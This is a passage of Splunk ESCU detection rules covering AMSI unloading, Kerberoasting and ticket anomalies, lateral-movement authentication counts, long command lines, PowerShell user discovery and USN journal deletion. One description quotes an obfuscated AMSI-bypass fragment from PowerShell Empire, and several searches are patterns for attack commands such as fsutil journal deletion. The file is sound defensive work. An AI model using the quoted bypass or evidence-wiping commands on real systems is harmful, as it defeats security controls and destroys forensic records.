endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Potential for some third party applications to disable AMSI upon invocation. Filter as needed. 
action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Unloading AMSI via Reflection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Possible AMSI Unloading via Reflection using PowerShell on $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Unloading AMSI via Reflection - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1562", "T1059.001", "T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies the behavior of AMSI being tampered with. 
Implemented natively in many frameworks, the command will look similar to `SEtValuE($Null,(New-OBJEct COLlECtionS.GenerIC.HAshSEt{[StrINg]))}$ReF=[ReF].AsSeMbLY.GeTTyPe("System.Management.Automation.Amsi"+"Utils")` taken from Powershell-Empire. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Unloading AMSI via Reflection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = *system.management.automation.amsi* | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `unloading_amsi_via_reflection_filter` [ESCU - Unusual Number of Computer Service Tickets Requested - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic leverages Event ID 4769, `A Kerberos service ticket was requested`, to identify an unusual number of computer service ticket requests from one source. When a domain joined endpoint connects to a remote endpoint, it first will request a Kerberos Ticket with the computer name as the Service Name. 
An endpoint requesting a large number of computer service tickets for different endpoints could represent malicious behavior like lateral movement, malware staging, reconnaissance, etc. The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number of service requests. To customize this analytic, users can try different combinations of the `bucket` span time, the calculation of the `upperBound` field as well as the Outlier calculation. This logic can be used for real time security monitoring as well as threat hunting exercises. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic leverages Event ID 4769, `A Kerberos service ticket was requested`, to identify an unusual number of computer service ticket requests from one source. When a domain joined endpoint connects to a remote endpoint, it first will request a Kerberos Ticket with the computer name as the Service Name. An endpoint requesting a large number of computer service tickets for different endpoints could represent malicious behavior like lateral movement, malware staging, reconnaissance, etc. The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number of service requests. To customize this analytic, users can try different combinations of the `bucket` span time, the calculation of the `upperBound` field as well as the Outlier calculation. This logic can be used for real time security monitoring as well as threat hunting exercises. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. 
The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = A single endpoint requesting a large number of computer service tickets is not common behavior. Possible false positive scenarios include but are not limited to vulnerability scanners, administration systems and misconfigured systems. action.escu.creation_date = 2021-12-01 action.escu.modification_date = 2021-12-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Unusual Number of Computer Service Tickets Requested - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Unusual Number of Computer Service Tickets Requested - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4769 Service_Name="*$" Account_Name!="*$*" | bucket span=2m _time | stats dc(Service_Name) AS unique_targets values(Service_Name) as host_targets by _time, Client_Address, Account_Name | eventstats avg(unique_targets) as comp_avg , 
stdev(unique_targets) as comp_std by Client_Address, Account_Name | eval upperBound=(comp_avg+comp_std*3) | eval isOutlier=if(unique_targets >10 and unique_targets >= upperBound, 1, 0) | `unusual_number_of_computer_service_tickets_requested_filter` [ESCU - Unusual Number of Kerberos Service Tickets Requested - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential Kerberoasting attack against Active Directory networks. Kerberoasting allows an adversary to request Kerberos tickets for domain accounts typically used as service accounts and attempt to crack them offline, allowing them to obtain privileged access to the domain.\ The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number of service ticket requests. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic leverages Kerberos Event 4769, A Kerberos service ticket was requested, to identify a potential Kerberoasting attack against Active Directory networks. Kerberoasting allows an adversary to request Kerberos tickets for domain accounts typically used as service accounts and attempt to crack them offline, allowing them to obtain privileged access to the domain.\ The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number of service ticket requests. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. 
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = A single endpoint requesting a large number of Kerberos service tickets is not common behavior. Possible false positive scenarios include but are not limited to vulnerability scanners, administration systems and misconfigured systems. action.escu.creation_date = 2022-02-08 action.escu.modification_date = 2022-02-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Unusual Number of Kerberos Service Tickets Requested - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "Client_Address", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Unusual Number of Kerberos Service Tickets Requested - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4769 Service_Name!="*$" Ticket_Encryption_Type=0x17 
| bucket span=2m _time | stats dc(Service_Name) AS unique_services values(Service_Name) as requested_services by _time, Client_Address | eventstats avg(unique_services) as comp_avg , stdev(unique_services) as comp_std by Client_Address | eval upperBound=(comp_avg+comp_std*3) | eval isOutlier=if(unique_services > 2 and unique_services >= upperBound, 1, 0) | search isOutlier=1 | `unusual_number_of_kerberos_service_tickets_requested_filter` [ESCU - Unusual Number of Remote Endpoint Authentication Events - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic leverages Event ID 4624, `An account was successfully logged on`, to identify an unusual number of remote authentication attempts coming from one source. An endpoint authenticating to a large number of remote endpoints could represent malicious behavior like lateral movement, malware staging, reconnaissance, etc. The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusually high number of authentication events. To customize this analytic, users can try different combinations of the `bucket` span time, the calculation of the `upperBound` field as well as the Outlier calculation. This logic can be used for real time security monitoring as well as threat hunting exercises. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic leverages Event ID 4624, `An account was successfully logged on`, to identify an unusual number of remote authentication attempts coming from one source. An endpoint authenticating to a large number of remote endpoints could represent malicious behavior like lateral movement, malware staging, reconnaissance, etc. The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusually high number of authentication events. To customize this analytic, users can try different combinations of the `bucket` span time, the calculation of the `upperBound` field as well as the Outlier calculation. This logic can be used for real time security monitoring as well as threat hunting exercises. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Event Logs from domain controllers as well as member servers and workstations. The Advanced Security Audit policy setting `Audit Logon` within `Logon/Logoff` needs to be enabled. action.escu.known_false_positives = A single endpoint authenticating to a large number of hosts is not common behavior. Possible false positive scenarios include but are not limited to vulnerability scanners, jump servers and misconfigured systems. 
action.escu.creation_date = 2021-12-01 action.escu.modification_date = 2021-12-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Unusual Number of Remote Endpoint Authentication Events - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Active Directory Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Unusual Number of Remote Endpoint Authentication Events - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4624 Logon_Type=3 Account_Name!="*$" | eval Source_Account = mvindex(Account_Name, 1) | bucket span=2m _time | stats dc(ComputerName) AS unique_targets values(ComputerName) as target_hosts by _time, Source_Network_Address, Source_Account | eventstats avg(unique_targets) as comp_avg , stdev(unique_targets) as comp_std by Source_Network_Address, Source_Account | eval upperBound=(comp_avg+comp_std*3) | eval isOutlier=if(unique_targets >10 and unique_targets >= upperBound, 1, 0) | `unusual_number_of_remote_endpoint_authentication_events_filter` [ESCU - Unusually Long Command Line - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by 
the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects command lines that are extremely long, which might be indicative of malicious activity on your hosts because attackers often use obfuscated or complex command lines to hide their actions and evade detection. This helps to mitigate the risks associated with long command lines to enhance your overall security posture and reduce the impact of attacks. This detection is important because it suggests that an attacker might be attempting to execute a malicious command or payload on the host, which can lead to various damaging outcomes such as data theft, ransomware, or further compromise of the system. False positives might occur since legitimate processes or commands can sometimes result in long command lines. Next steps include conducting extensive triage and investigation to differentiate between legitimate and malicious activities. Review the source of the command line and the command itself during the triage. Additionally, capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the source of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects command lines that are extremely long, which might be indicative of malicious activity on your hosts because attackers often use obfuscated or complex command lines to hide their actions and evade detection. This helps to mitigate the risks associated with long command lines to enhance your overall security posture and reduce the impact of attacks. 
This detection is important because it suggests that an attacker might be attempting to execute a malicious command or payload on the host, which can lead to various damaging outcomes such as data theft, ransomware, or further compromise of the system. False positives might occur since legitimate processes or commands can sometimes result in long command lines. Next steps include conducting extensive triage and investigation to differentiate between legitimate and malicious activities. Review the source of the command line and the command itself during the triage. Additionally, capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the source of the attack. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some legitimate applications start with long command lines. 
action.escu.creation_date = 2020-12-08
action.escu.modification_date = 2020-12-08
action.escu.confidence = high
action.escu.full_search_name = ESCU - Unusually Long Command Line - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Command-Line Executions", "Unusual Processes", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Ransomware"]
action.risk = 1
action.risk.param._risk_message = Unusually long command line $process_name$ on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Unusually Long Command Line - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions", "Unusual Processes", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Ransomware"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes by Processes.user Processes.dest Processes.process_name Processes.process | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| eval processlen=len(process) | eventstats stdev(processlen) as stdev, avg(processlen) as avg by dest | stats max(processlen) as maxlen, values(stdev) as stdevperhost, values(avg) as avgperhost by dest, user, process_name, process | `unusually_long_command_line_filter` |eval threshold = 3 | where maxlen > ((threshold*stdevperhost) + avgperhost)

[ESCU - Unusually Long Command Line - MLTK - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. Command lines that are extremely long may be indicative of malicious activity on your hosts. This search leverages the Machine Learning Toolkit (MLTK) to help identify command lines with lengths that are unusual for a given user.
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = Command lines that are extremely long may be indicative of malicious activity on your hosts. This search leverages the Machine Learning Toolkit (MLTK) to help identify command lines with lengths that are unusual for a given user.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Some legitimate applications use long command lines for installs or updates. You should review identified command lines for legitimacy. You may modify the first part of the search to omit legitimate command lines from consideration. If you are seeing more results than desired, you may consider changing the value of threshold in the search to a smaller value. You should also periodically re-run the support search to re-build the ML model on the latest data. You may get unexpected results if the user identified in the results is not present in the data used to build the associated model.
action.escu.creation_date = 2019-05-08
action.escu.modification_date = 2019-05-08
action.escu.confidence = high
action.escu.full_search_name = ESCU - Unusually Long Command Line - MLTK - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Command-Line Executions", "Unusual Processes", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Ransomware"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Unusually Long Command Line - MLTK - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions", "Unusual Processes", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes by Processes.user Processes.dest Processes.process_name Processes.process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| eval processlen=len(process) | search user!=unknown | apply cmdline_pdfmodel threshold=0.01 | rename "IsOutlier(processlen)" as isOutlier | search isOutlier > 0 | table firstTime lastTime user dest process_name process processlen count | `unusually_long_command_line___mltk_filter`

[ESCU - User Discovery With Env Vars PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with command-line arguments that leverage PowerShell environment variables to identify the currently logged-in user. Red Teams and adversaries may leverage this method to identify the logged-in user on a compromised endpoint for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with command-line arguments that leverage PowerShell environment variables to identify the currently logged-in user. Red Teams and adversaries may leverage this method to identify the logged-in user on a compromised endpoint for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting.
action.escu.creation_date = 2021-09-13
action.escu.modification_date = 2021-09-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - User Discovery With Env Vars PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - User Discovery With Env Vars PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="powershell.exe") (Processes.process="*$env:UserName*" OR Processes.process="*[System.Environment]::UserName*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `user_discovery_with_env_vars_powershell_filter`

[ESCU - User Discovery With Env Vars PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the use of PowerShell environment variables to identify the currently logged-in user. Red Teams and adversaries may leverage this method to identify the logged-in user on a compromised endpoint for situational awareness and Active Directory Discovery.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the use of PowerShell environment variables to identify the currently logged-in user. Red Teams and adversaries may leverage this method to identify the logged-in user on a compromised endpoint for situational awareness and Active Directory Discovery.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting.
action.escu.creation_date = 2022-03-22
action.escu.modification_date = 2022-03-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - User Discovery With Env Vars PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Discovery"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - User Discovery With Env Vars PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1033"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText = "*$env:UserName*" OR ScriptBlockText = "*[System.Environment]::UserName*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | rename Computer as dest, user_id as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `user_discovery_with_env_vars_powershell_script_block_filter`

[ESCU - USN Journal Deletion - Rule]
action.escu = 0
action.escu.enabled = 1
description = The fsutil.exe application is a legitimate Windows utility used to perform tasks related to the file allocation table (FAT) and NTFS file systems. The update sequence number (USN) change journal provides a log of all changes made to the files on the disk. This search looks for fsutil.exe deleting the USN journal.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The fsutil.exe application is a legitimate Windows utility used to perform tasks related to the file allocation table (FAT) and NTFS file systems. The update sequence number (USN) change journal provides a log of all changes made to the files on the disk. This search looks for fsutil.exe deleting the USN journal.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = None identified
action.escu.creation_date = 2018-12-03
action.escu.modification_date = 2018-12-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - USN Journal Deletion - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Log Manipulation", "Ransomware"]
action.risk = 1
action.risk.param._risk_message = Possible USN journal deletion on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - USN Journal Deletion - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Log Manipulation", "Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The fsutil.exe application is a legitimate Windows utility used to perform tasks related to the file allocation table (FAT) and NTFS file systems. The update sequence number (USN) change journal provides a log of all changes made to the files on the disk. This search looks for fsutil.exe deleting the USN journal.
action.notable.param.rule_title = USN Journal Deletion
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fsutil.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | search process="*deletejournal*" AND process="*usn*" | `usn_journal_deletion_filter`

[ESCU - Vbscript Execution Using Wscript App - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects a suspicious wscript command line used to execute VBScript. This technique was seen in several malware families executing a malicious .vbs file using the wscript application. Commonly, .vbs scripts are associated with the cscript process, so this can be a technique to evade parent-child process detections or even some AV script emulation systems.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic detects a suspicious wscript command line used to execute VBScript. This technique was seen in several malware families executing a malicious .vbs file using the wscript application. Commonly, .vbs scripts are associated with the cscript process, so this can be a technique to evade parent-child process detections or even some AV script emulation systems.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-10-01
